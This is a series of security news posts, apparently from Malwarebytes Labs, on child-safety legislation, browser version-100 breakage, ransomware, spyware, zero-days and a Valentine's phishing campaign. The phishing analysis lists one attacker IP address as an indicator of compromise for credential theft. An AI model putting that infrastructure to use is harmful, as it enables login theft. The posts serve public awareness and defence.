IT NEWS

US Senators Richard Blumenthal of Connecticut and Marsha Blackburn of Tennessee have introduced the Kids Online Safety Act (KOSA), legislation that aims to enhance children’s safety online.

This follows the The Wall Street Journal (WSJ)’s reporting on the harm Instagram can inflict on teens, which was based on controversial Facebook documents that whistleblower Frances Haugen leaked to the WSJ, and coupled with multiple hearings with social media companies about their failures to protect kids online.

“Protecting our kids and teens online is critically important, particularly since COVID increased our reliance on technology,” said Blackburn in a press release.

“Big Tech has brazenly failed children and betrayed its trust, putting profits above safety. Seared in my memory—and motivating my passion—are countless harrowing stories from Connecticut and across the country about heartbreaking loss, destructive emotional rabbit holes, and addictive dark places rampant on social media. The Kids Online Safety Act would finally give kids and their parents the tools and safeguards they need to protect against toxic content—and hold Big Tech accountable for deeply dangerous algorithms. Algorithms driven by eyeballs and dollars will no longer hold sway.”

In a one-page summary document, KOSA is presented as a solution to the longstanding problem of social media platforms playing a hand in their most vulnerable users’ mental health and well-being: children and teens. The senators presented how parents or carers and young social media users can benefit from KOSA by:

• Requiring social media platforms to provide their young users (age 16 years and below) options to protect their online information, disable features that would cause them addiction, and opt out of algorithmic recommendations. These algorithms pull from a user’s personal data to suggested content that triggers users to keep scrolling.
• Requiring platforms to enable the strongest possible setting to minors by default.
• Giving parents provision to support children under their care and identify harmful behavior. Platforms should also provide parents and kids a dedicated channel where they can report harms.
• Creating accountability for social media platforms to act in preventing and mitigating content that could harm minors. Such content includes the promotion of unlawful products for minors (e.g. gambling and alcohol), self-harm, substance abuse, eating disorder, sexual exploitation, and suicide.
• Requiring social media platforms to conduct an annual independent audit aimed at assessing risks to minors, compliance to legislation, and whether they are taking meaningful steps to ensure that harms are prevented. The end product of this assessment would be an annual report.
• Providing academic researchers and non-profit organizations access to critical social media platform datasets to foster research on the safety and well-being of minors. This would also require the National Telecommunications and Information Administration to setup a program where researchers could apply for data sets from these social media platforms.

Meanwhile in California, lawmakers introduced a bill on Thursday that requires Meta and YouTube to limit collecting children’s data on their platforms. If passed into law, the profiling of young users for targeted advertising will be restricted, introducing age-appropriate content policies will be mandated, and serving up behavioral nudges to get children and teens to weaken their privacy protections will be banned.

This California bill is said to be modeled after the UK’s Age Appropriate Design Code (aka “Children’s Code”), which came into force in September 2021.

The post US senators introduce the Kids Online Safety Act (KOSA) appeared first on Malwarebytes Labs.

Mozilla has issued a warning about the upcoming versions 100 for both Chrome and Firefox. The change in the version number from 2 to 3 digits may cause some problems when visiting websites that are not prepared for this change. For example, it’s possible that some parsing libraries may have hard-coded assumptions or bugs that don’t take into account three-digit major version numbers.

Version 100

Chrome expected to reach the first three digit major version number in the first half of 2022. According to the Firefox release calendar, Firefox Nightly will reach version 100 during the first quarter of 2022 (probably March). At that rate it will reach Firefox stable release version early May 2022.

For now, the estimated dates are March 29 for Chrome and May 3 for Firefox.

User agent string

The problem originates from the user agent string that browsers send to websites you are visiting. If you are the kind of person that uses different browsers or different devices to access websites, you may have noticed that sites can look quite different depending on which browser you use to view them. When your browser sends a request to a website, it identifies itself with the user agent string before it retrieves the content you’ve requested. The data in the user agent string help the website to deliver the content in a format that suits your browser. Even though depending on user agents alone is no longer enough to optimize a website, they are still an important source of information.

For web browsers the format of the user agent string is:

[Browser]/[version] ([system and browser information]) [platform] ([platform details]) [extensions]

For example the latest version of Firefox will show:

Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

Why is that a problem?

As we pointed out, websites read the user agent string and optimize their content for the browser they identify by reading that information.

Some website developers will have created routines or use JavaScript libraries to identify the string Firefox and then grab either the first two digits after the semicolon “/” or the last two digits before the “.” which does not pose any problems as long as the user agent string is broadcasting two digits. But now that the last part will change to Firefox/100.0 these routines will identify your Firefox version as respectively “10” or “00”. Other libraries may even return a null result which will effectively break the site.

As a result of a mismatched version number, the visitor may get the version of the website that was designed for very early versions of the correct browser, or a version that was designed to work for all types of “unidentifiable” browsers. This is usually not an optimal experience.

Testing

Both Mozilla and Firefox are testing the compatibility of major websites ahead of time.

With the experience racked up back when browsers first reached version 10 long ago, when lots of issues were discovered with User Agent parsing libraries, Chrome has warned that developers and IT admins should test their services in advance to avoid the same issues from happening again.

If there are issues with sites that Mozilla or Google cannot fix before these versions are released, both Google and Mozilla have backup plans ready to ensure the sites are not affected.

If you would like to help testing or to test your own site, you can read here how to proceed, and if you notice something that is breaking because of the user agent string, you are welcome to file a report on webcompat.

Edge

Edge is not trailing far behind in version number, but since Edge is a Chromium based browser we can expect the worst problems to be found out by that time. Starting with Microsoft Edge 97, site owners can test this upcoming user agent string by enabling the #force-major-version-to-100 experiment flag in edge://flags to ensure their user agent parsing logic is robust and works as expected.

The post Firefox and Chrome reaching major versions 100 may break some websites appeared first on Malwarebytes Labs.

A journalist incorrectly branded as a “hacker” by the governor of Missouri won’t be prosecuted “for hacking”.

This was a quick and foreseen win for St. Louis Post-Dispatch reporter Josh Renaud after a prosecutor from Cole County dismissed Missouri Governor Mike Parson’s criminal charges against him for allegedly hacking a government website by viewing its public HTML code— something anyone can do by simply pressing the F12 button.

Perhaps due to the absurd allegation, Internet users following the cause couldn’t help but rename this as “the F12 case”.

Locke Thompson, a Cole County Prosecutor, released a statement on Friday last week, which includes:

“There is an argument to be made that there was a violation of law. However, upon a review of the case file, the issues at the heart of the investigation have been resolved through non-legal means, As such, it is not in the best interest of Cole County citizens to utilize the significant resources and taxpayer dollars that would be necessary to pursue misdemeanor criminal charges in this case. The investigation is now closed, and the Cole County Prosecutor’s Office will have no further comment on the matter.”

How it all began

In October 2021, St. Louis Post-Dispatch pushed out Renaud’s story about a flaw on a website maintained by the Missouri Department of Elementary and Secondary Education (DESE) which exposed Social Security numbers (SSNs) of administrators, counselors, and school teachers across the state, putting more than 100,000 educators at risk.

According to Renaud’s article, the teacher’s SSNs were contained in the site’s HTML source code. This is easily accessed by simply pressing the F12 function key and opening the Developer’s Console on the right-hand side of the webpage. When consulted, Shaji Khan, a cybersecurity professor at the University of Missouri-St. Louis confirmed Renaud’s findings, calling it “a serious flaw.”

“We have known about this type of flaw for at least 10-12 years, if not more,” Khan was quoted in an email, “The fact that this type of vulnerability is still present in the DESE web application is mind-boggling!”

The department was supposed to discuss Renaud’s findings, but things took a quick turn for the worse. On Wednesday evening, the department sent out a letter to teachers and posted a press release on its website, minimizing the flaw’s impact and blaming Renaud—and by association, the Post-Dispatch—for taking records of educators from their site.

Education Commissioner Margie Vandeven said in a letter to teachers that “an individual took the records of at least three educators, unencrypted the source code from the webpage, and viewed the social security number (SSN) of those specific educators.”

An echo of this sentiment was reflected in the press release, further stating that the person (Renaud) responsible for discovering the flaw was a “hacker” and “took the records of at least three educators.”

In reality, according to the Post-Dispatch, Renaud had discovered the flaw and confirmed that the nine-digit numbers he’d seen on the webpage’s code were indeed SSNs. The paper had also told DESE that it confirmed the flaw with three educators and Professor Khan. Post-Dispatch further noted that these SSNs were available and searchable by anyone through DESE’s educator certification search tool on its website.

Although the SSNs in the HTML were encoded and not in plain text, they were not encrypted, said Khan in a separate Post-Dispatch article. Encrypted data would require a unique decryption key to view the actual data. On the other hand, encoded data only means that the data is in a different format.

“Anybody who knows anything about development—and the bad guys are way ahead—can easily decode that data,” Khan said. That wasn’t even the issue though. The bigger problem, according to Khan, was the presence of sensitive data accessible by anyone with a browser.

DESE has made teacher information accessible to local school districts when verifying a teacher’s certification. As SSNs are part of the information pool, it would be easy to identify an educator using the last four digits of their SSN. After Renaud reported the flaw to DESE, this search tool has been removed.

Joseph Martineau, a Lewis Rice attorney representing Post-Dispatch, issued the following response to DESE’s press release:

“The reporter did the responsible thing by reporting his findings to DESE so that the state could act to prevent disclosure and misuse. A hacker is someone who subverts computer security with malicious or criminal intent. Here, there was no breach of any firewall or security and certainly no malicious intent.

For DESE to deflect its failures by referring to this as ‘hacking’ is unfounded. Thankfully, these failures were discovered.”

It should also be noted Post-Dispatch held off publishing Renaud’s article to give DESE enough time to address the flaw in its site.

The state of Missouri also targeted Professor Khan in their investigations, but this was halted after Khan sent a litigation hold and demand letter to Parson and some state agencies.

Relief for Renaud

Josh Renaud issued a statement expressing relief and remorse for the damage done to him and his family. He described the entire ordeal as “a political prosecution of a journalist.”

“Despite this, I am proud that my reporting exposed a critical issue, and that it caused the state to take steps to better safeguard teachers’ private data. At the same time, I am concerned that the governor’s actions have left the state more vulnerable to future bad actors. His high-profile threats of legal retribution against me and the Post-Dispatch likely will have a chilling effect, deterring people from reporting security or privacy flaws in Missouri, and decreasing the chance those flaws get fixed.”

Gov. Parson could have responded to Renaud’s reporting differently, and hacker Rachel Tobac couldn’t have encapsulated this more perfectly:

The post Journalist won’t be indicted for hacking for viewing a state website’s HTML appeared first on Malwarebytes Labs.

The European Data Protection Supervisor (EDPS) has urged the EU to ban the development and deployment of spyware with the capabilities of Pegasus to protect fundamental rights and freedoms.

What is Pegasus?

On July 18, a group of 17 newspaper and media organizations—aided by Amnesty International’s Security Lab and the research group Citizen Lab—revealed that one of the world’s most advanced and viciously invasive spyware tools had been used to hack, or attempt to hack, into 37 mobile phones owned by human rights activists, journalists, political dissidents, and business executives.

This spyware, called Pegasus and developed by the Israeli company NSO Group, is reportedly instrumental to several governments’ oppressive surveillance campaigns against their own citizens and residents. Pegasus is designed to successfully attack almost any smartphone running either iOS or Android, based on specific yet very basic information like a telephone number. Pegasus effectively turns the smartphone into a 24/7 surveillance device by gaining complete access to all sensors and information on the smartphone, including messages before they are encrypted, geolocation, camera, and calls. As Amnesty International’s Security Lab put it:

“Pegasus can do more than what the owner of the device can do.”

For an in-depth look at Pegasus, have a listen to our podcast about the world’s most coveted spyware, Pegasus: Lock and Code S03E04.

What is the EDPS?

The European Data Protection Supervisor (EDPS) is the European Union’s (EU) independent data protection authority. The EDPS is an increasingly influential supervisory authority that aims to provide requested as well as unsolicited advice to EU institutions and bodies on all matters relating to the processing of personal data.

Besides monitoring and ensuring the protection of personal data and privacy when EU institutions and bodies process the personal information of individuals, one of the EDPS missions is to monitor new technology that may affect the protection of personal information.

Level of intrusiveness

The EDPS is convinced that the use of Pegasus might lead to an unprecedented level of intrusiveness, threatening the very essence of the right to privacy, since the spyware is capable of interfering with the most intimate aspects of our daily lives.

The EDPS warns against regarding Pegasus as yet another law enforcement interception tool, but more as a hacking tool that has to be seen as a government Trojan in the form of a permanent backdoor. Unfortunately, Pegasus is not the only spyware tool of this type that is marketed as a law enforcement tool. However, Pegasus is considered a game-changer that renders existing legal and technical safeguards ineffective and meaningless.

EU law

Targeted surveillance is regulated in the national legislation of virtually every EU member state. But Article 52(1) of the EU Charter of Fundamental Rights requires that any limitations on the exercise of the fundamental rights and freedoms of the individual are proportionate and necessary. Such limitations must in any event be provided for by law and respect the essence of the fundamental rights and freedoms as recognized by the Charter.

The EDPS considers that only in cases of a very exceptional nature could Pegasus meet the requirements of proportionality and even in those cases less intrusive surveillance tools would be preferable. Therefore, using information gathered with the help of Pegasus and similar tools is likely to be considered inadmissible in a court of law. Also, many forensic experts may not have the necessary knowledge to identify and examine such highly advanced technology developed by private companies.

The advice

In its conclusion, the EDPS states that:

 “Pegasus constitutes a paradigm shift in terms of access to private communications and devices, which is able to affect the very essence of our fundamental rights, in particular the right to privacy. This fact makes its use incompatible with our democratic values. “

The EDPS therefore believes that a ban on the development of spyware with the capability of Pegasus in the EU would be the most effective option to protect our fundamental rights and freedoms.

It goes on to provide a list of steps and measures to block the unlawful use of Pegasus and similar tools:

• Strengthen the democratic oversight over surveillance measures.
• A strict implementation of the EU legal framework on data protection.
• Judicial review of surveillance order applications should not be a mere formality.
• Criminal procedural laws should outlaw the use of highly intrusive hacking tools.
• Reduce the risk of using data gained by such methods reaching the databases of the European Union (e.g. Europol).
• Stop (ab)using “national security” purposes for legitimizing politically motivated surveillance.
• Address deficiencies in the rule of law that create grounds for abuse of secret surveillance.
• Bring awareness and public debate to support and empower civil society.

By publishing this document, the EDPS has made its contribution to the public discussion whether there is a place for spyware tools like Pegasus in a democratic society.

The ban

Given that some member states of the EU are listed as NSO Group customers, the reason for requesting this ban is clear. It should also be clear by now that the individuals targeted by using Pegasus are not terrorist organizations, drug cartels, human traffickers, pedophile rings or other criminal syndicates, but rather reporters, scientists, romantic partners, and potentially even heads of state.

But, knowing how hard it is to detect such tools on affected devices, and—even if they are detected—finding out who is behind the infection in the first place, there will be people and organizations that are willing to risk using such tools.

Stay safe, everyone!

The post Ban Pegasus spyware, urges European Union Data Protection Supervisor appeared first on Malwarebytes Labs.

Roblox gamers are once again being warned to be on their guard against scammers plundering valuable digital items.

Most multiplayer titles are all about customization. You won’t find many popular games where digital items aren’t up for grabs. Some games lock the items, such as outfits, weapons, or valuables, to your account and/or characters. Other games allow players to trade them. Those trades can be straightforward item swaps, or paid for with in-game fictional currency. They might end up on marketplaces where they’re bought and sold with real world cash. It all depends. This isn’t new, but it is awful.

What’s happening with Roblox?

Roblox allows you to make your own games, or just take part in challenges created by others. It’s constantly changing, and there’s always something new to do. As a result, it’s hugely popular with young kids and teens. Their accounts and digital items are highly coveted by scammers and account compromisers. In Roblox land, these people are known as “Beamers”.

Beamers use a variety of tricks to compromise accounts, and then head off to various shady marketplaces. There, they try to sell or trade for US dollars or cryptocurrency. This is pretty commonplace for a large number of online titles, but ripping off kids is always going to leave a bad taste in the mouth.

How do scammers rip off Roblox players?

It’s a mixture of old and new techniques. Below, we’ve listed some from the Beamer article and a few which we’ve looked at ourselves. Forewarned is forearmed, and all that.

• Phishing: Beamers use creation kits to whip up bogus sites for their imitation domains. As the article mentions, it often begins with a message sent to another player. While we don’t know the content of those messages, a popular trick is to pretend they’re a game admin or mod. The Beamer might claim the victim is in trouble, or has failed a safety check. Or they might claim to be offering a cool free item.
• SIM swap: Another timeless classic. This is where attackers trick mobile networks into redirecting texts to their own device. By doing so, they can bypass SMS based two-factor authentication because the codes end up being sent to them, as opposed to the victim.
• Generators: Never discount the allure of free in-game currency. Generators aren’t mentioned in the article, but they are a mainstay of scam tactics. Offer a bogus tool, claim to create as much currency as the victim requires, and have them run it. The executable may contain malware, or it may direct the user to a phish or survey scam.
• Ransomware: Another one for the “I didn’t expect that” pile. In this particular instance, we’re talking bogus versions of real tools designed to automate certain functions.

Scammer hideouts and information gathering tools

It appears a lot of the Beamer activity takes place inside services such as Discord. This makes sense; it’s a fast, easy way to keep trades flowing with minimal set-up fuss for the creator to worry about. Tying Discord channels to phishing pages so the owner knows when someone has entered details is part of the trick.

Additionally, gaming data often feeds into third-party sites. This can be useful. If you play an MMORPG and need to buy low/sell high? There’s usually a site for that, and it’s possible you’ll be able to see the item owner’s character details, or the server they play on. Great for trades, but bad for painting a large target on your back. Years ago, scammers would filter Xbox360 gamers by prestigious achievements and high gamer scores and mark targets that way. Now it’s a lot more item/commodity centric, but despite this the account is still at risk of being hijacked and sold on.

Time to lock down your Roblox accounts

A good reminder, then, to keep yourself up to date with the security measures recommended on the Roblox security page. You can bet people are coming up with new and creative ways to relieve you of your account at any given moment. It’s up to you to ensure you’re always one step ahead of the item-stealing crowd.

The post Roblox Beamers steal items from kids appeared first on Malwarebytes Labs.

Google has released an update for its Chrome browser that includes eleven security fixes, one of which has been reportedly exploited in the wild.

The vulnerability that is reported as being exploited in the wild has been assigned CVE-2022-0609.

CVE-2022-0609

The vulnerability is described as a Use-after-free (UAF) vulnerability in the Animation component. UAF is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program’s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. In this case, when the vulnerability is exploited, this can lead to corruption of valid data and the execution of arbitrary code on affected systems.

As a result, a remote attacker can create a specially crafted web page, trick the victim into visiting it, trigger the UAF vulnerability and execute arbitrary code on the target system.

The researchers who found and reported the flaw are Adam Weidemann and Clément Lecigne of Google’s Threat Analysis Group (TAG). As usual, Google hasn’t gone into any more detail about the bug. Access to bug details and links are usually restricted until the majority of users are updated with a fix.

Other vulnerabilities

Other vulnerabilities that have been discovered by external researchers are;

• CVE-2022-0603: Use after free in File Manager.
• CVE-2022-0604: Heap buffer overflow in Tab Groups.
• CVE-2022-0605: Use after free in Webstore API.
• CVE-2022-0606: Use after free in ANGLE.
• CVE-2022-0607: Use after free in GPU.
• CVE-2022-0608: Integer overflow in Mojo.
• CVE-2022-0610: Inappropriate implementation in Gamepad API.

How to protect yourself

If you’re a Chrome user on Windows, Mac, or Linux, you should update to version 98.0.4758.102 as soon as possible.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerability. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

After the update the version should be 98.0.4758.102. Since Animations is a Chromium component, users of other Chromium based browsers may see a similar update.

Stay safe, everyone!

The post Update now! Chrome patches actively exploited zero-day vulnerability appeared first on Malwarebytes Labs.

Adobe has released an emergency advisory for users of its Commerce and Magento platforms. It explains that a critical zero-day vulnerability is actively being exploited in attacks against sites that use these two content management system (CMSs). Users should apply the patch as soon as possible.

The vulnerability

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability has been assigned CVE-2022-24086.

The flaw is described as an improper input validation vulnerability which could lead to arbitrary code execution. The vulnerability is exploitable without credentials and is rated as critical. It has been rated with a CVSS score of 9.8 out of 10.

A remote and unauthorized attacker can send a malicious request to the application and execute arbitrary code on the target server. Successful exploitation of this vulnerability may result in complete compromise of the affected system.

Adobe says its own security team discovered the flaw but it is aware that CVE-2022-24086 has been exploited in the wild in very limited attacks. No other information has been provided about the vulnerability to limit the possibility of further exploitation.

Needless to say, if you operate one of the affected products, patch now.

Affected products

Magento is an Adobe company that offers a hosted and self-hosted CMS for web shops. The free version of Magento is open source which offers users the option to make their own changes and allows developers to create extensions for the CMS.

The vulnerability affects Adobe Commerce and Magento Open Source 2.4.3-p1 and earlier versions, as well as 2.3.7-p2 and earlier versions.

Magecart

Only recently we published a blog about a new Magecart campaign which was aimed at Magento sites, but that campaign primarily targeted the Magento 1 version of the CMS which has reached end-of-life (EOL) and has not been supported since June 30, 2020. Were Magecart to get its hands on this vulnerability, that would raise the number of potential targets by hundreds of thousands.

Keeping your site safe

We have written an extensive post about how to defend your website against skimmers, but in summary, here’s what you need to do to keep your site safe:

• Make sure that the systems used to administer the site are clean of malware.
• Use strong passwords and do not reuse them.
• Limit the number of administrators.
• Keep your site’s software updated.
• Use a Web Application Firewall (WAF).
• Know that each dependency is a potential backdoor into your web pages.
• Use a Content Security Policy (CSP).
• Make sure you are made aware in case of problems, either by checking yourself or by having it done for you.

How to apply a patch

Unzip the relevant file which you can select here and follow the instructions in how to apply a composer patch provided by Adobe.

Stay safe, everyone!

The post Adobe patches actively exploited Magento/Adobe Commerce zero-day appeared first on Malwarebytes Labs.

The San Francisco 49ers has confirmed that it has been hit by a ransomware attack. The announcement came just hours before the biggest football game of the year, Sunday’s Super Bowl between the Cincinnati Bengals and the Los Angeles Rams.

In a boilerplate statement to BleepingComputer, the 49ers revealed that the attack has caused temporary disruption to its IT network. As of this writing, it is in the process of recovering affected systems.

The San Francisco 49ers recently became aware of a network security incident that resulted in temporary disruption to certain systems on our corporate IT network. Upon learning of the incident, we immediately initiated an investigation and took steps to contain the incident.

The BlackByte ransomware gang has already claimed responsibility for the attack by leaking a small number of files it claims to have been stolen.

BlackByte

BlackByte ransomware is a relatively new ransomware-as-a-service (RaaS) tool, that has been around since July 2021. It is used by affiliates who breach organizations, steal valuable information, and then use ransomware to encrypt the organizations’ files—rendering them unusable. They then demand a ransom to decrypt the files, and threaten to leak the stolen data if it’s not paid.

Like other ransomware groups, the threat actors using Blackbyte have been known to use software exploits to breach victims’ networks, such as Microsoft’s well-publicised ProxyShell vulnerability. This only highlights the importance of applying software patches whenever they have been made available.

Our friends at Trustwave published a two-part [1] [2], in-depth analysis of the first version of BlackByte in October 2021. The analyses revealed a flaw in its code: The decryption/encryption key had been reused in multiple attacks. This allowed Trustwave researchers to create a free decyptor tool to help victims in the recovery of their files without paying the ransom.

Version two of BlackByte does not have this flaw, so the 49ers will likely have to rely on backups to recover its affected systems.

A timely FBI advisory

Just a couple of days before the attack, on Friday 11 February, the FBI released an advisory warning about the dangers of BlackByte ransomware:

As of November 2021, BlackByte ransomware had compromised multiple US and foreign businesses, including entities in at least three US critical infrastructure sectors (government facilities, financial, and food & agriculture). BlackByte is a Ransomware as a Service (RaaS) group that encrypts files on compromised Windows host systems, including physical and virtual servers.

The advisort includes a number of BlackByte indicators of compromise (IOCs)—digital clues such as files, hashes, file modifications, and registry changes—associated with BlackByte activity. These help IT and security professionals determine if it is on, or has been on, their systems.

Lastly the FBI has advised organizations to keep regular backups of their data. That’s good advice, but there are other things you should consider too: Network segmentation to limit an attacker’s ability to move through your network; patching all systems to to prevent breaches; using two-factor authentication and rate limiting to prevent brute force password guessing; and regular account audits to beef up account security.

Backups are a vitally important last line of defence against ransomware, but they often fail when people need them most. In a recent Malwarebytes Lock and Code podcast, host David Ruiz spoke with Matt Crape, technical account manager for VMware, about why backups are so hard to get right, and what the most basic missteps are when companies roll out a backup plan.

The post Ransomware gang hits 49ers’ network before Super Bowl kick off appeared first on Malwarebytes Labs.

Today is Valentine’s Day, so we thought we’d show you how cybercriminals use special times like this one for phishing attacks.

Our Valentine’s story starts with a victim receiving an email message. The email urges them to open an attached file, and also contains well formatted content that tries to divert attention from the real scam:

These emails were sent from a legitimate account owned by artifactuprising.com, a well known company located in Colorado that sells various gifts. The email contains several links to their website, and its content isn’t malicious by itself. The scam is placed in the first lines, where it says:

Hello,

Please find the attached details of the funds that will be deposited into your bank account within the next few days by electronic funds transfer (EFT).

Any questions related to invoices or payments, please contact our payables department..

*Please do not reply to this email as it was generated automatically.

Thank you,

The malicious artifact then is the attachment that supposedly contains details about funds deposited in the victim’s bank account. This malicious document is an HTML file. When opened with a regular text editor, the file appears to have just Javascript code:

This one-liner JavaScript is just the means used by the attackers to hide the real malicious HTML document. Also, some security products will fail to detect it, as explicitly, no malicious strings are contained in the JS code.

Just unescaping the code, and after some deobfuscation work, we can now see suspicious elements contained in the file, giving us an idea about the attack:

As expected, what is shown to the user is a page that mimics an Outlook login page. Unexperienced users, or in fact, anyone that won’t pay enough attention could enter their credentials in the form. Note that the email address shown is unique per victim, so that increases the legitimate look of the attack.:

In the end, the fake form will send the stolen credentials to the attacker through a plain HTTP request forwarded to a malicious IP address that is under control of the attackers. The ai form field will contain the victim’s email address, and pr field will contain the password:

The used IP address is also hosted in the USA, and was used in the past as a Cobalt Strike server. It looks like this IP hosts an outdated Apache server version which is being leveraged by different attackers in various attacks.

Conclusion

We wish you a happy and secure Valentines Day, surrounded by the ones that you love. As you can see, phishing attacks nowadays are better looking than ever, and every one of us could be tricked. So remember to be suspicious about any email received that is not expected. Other indicators will include topics like required payments, or offering free funds, like in this case. Moreover, be extra cautious when this emails urges you to respond quickly. And, when doubt arises, don’t hesitate sharing suspicious emails with your IT security department.

Malwarebytes users were already protected against this attack.

IOCs

162.33.178.57

The post Don’t let scammers ruin your Valentine’s Day appeared first on Malwarebytes Labs.

Though we may be stuck with endless COVID-19 scams and a gradual visible rise in all manner of cryptocurrency hijinks, the old school attacks are as perilous as ever; CISA, the Cybersecurity & Infrastructure Security Agency, have released their 2021 report detailing the increasing globalised threat of the ransomware menace.

It covers a lot of ground, but many of the main findings won’t come as any surprise to those dealing with attacks over the last few years. Some of the more familiar efforts in the attack pipeline include:

• Phishing and stolen RDP credentials used to break into networks and then fire up the ransomware cannon
• Moving away from “big game” targets in order to go after much smaller ones. This keeps defenders with small security budgets on their toes, and also perhaps contributes to ransomware groups sailing under the radar. Nothing generates heat faster than major international attacks and lots of police involvement.
• Attacking Managed Service Providers (MSPs). This allows Ransomware authors to potentially take down several targets at once, should they manage to compromise the MSP.

Attacking the cloud is also popular. Not just because many instances of cloud applications are vulnerable to exploits, but also because a lot of businesses have their backups in the cloud, too. Your corporate backup plan in case of a ransomware attack won’t help if threat actors manage to encrypt all of the backups.

These are some of the techniques and strategies we’ve all come to see and also expect. But what else are they getting up to?

The triple threat

One of the most interesting parts of the report is the shift in how ransomware authors demand money, and also how they receive it. The days of the standard “Your PCs are encrypted, give us X amount in Bitcoin or you don’t get your files back” are no longer how everyone does it. The CISA summary highlights a type of ransomware attack that’s been growing in popularity for a while now:

Diversifying approaches to extorting money. After encrypting victim networks, ransomware threat actors increasingly used “triple extortion” by threatening to (1) publicly release stolen sensitive information, (2) disrupt the victim’s internet access, and/or (3) inform the victim’s partners, shareholders, or suppliers about the incident. The [Australian Cyber Security Centre] continued to observe “double extortion” incidents in which a threat actor uses a combination of encryption and data theft to pressure victims to pay ransom demands.

Not just regular extortion, or double extortion, but triple extortion! Telling everyone how badly you got it wrong, doubling down on shame and embarrassment, is going to have an impact. They’re plugging into the fear of the “big reveal” in a way that makes organisations fail to disclose ransomware incidents, or even wire fraud or anything else for that matter.

Ransomware authors in the driving seat

Triple threat extortion attempts featured heavily in the news halfway through last year. Any hopes they may have become a passing phase seem to be sadly mistaken.

As the years pass, so too does the threat escalation. Informing people and organisations you know, or work with, is one final insult. It’s the sextortion panic technique applied to the business environment. There’s nothing to stop the ransomware authors from doing what they want after getting onto the network, so why not? It’s win-win for them, which makes it essential to ensure they don’t ever get that far.

There is no end to ransomware attacks, or the type of data leaked via double or triple threat extortion. Here’s one such double-hitter from last Friday, and you can bet there’s a lot more happening this very second. One wonders what the quadruple-threat ransom will bring…

The post CISA Ransomware report warns “triple threat” attacks still on the prowl appeared first on Malwarebytes Labs.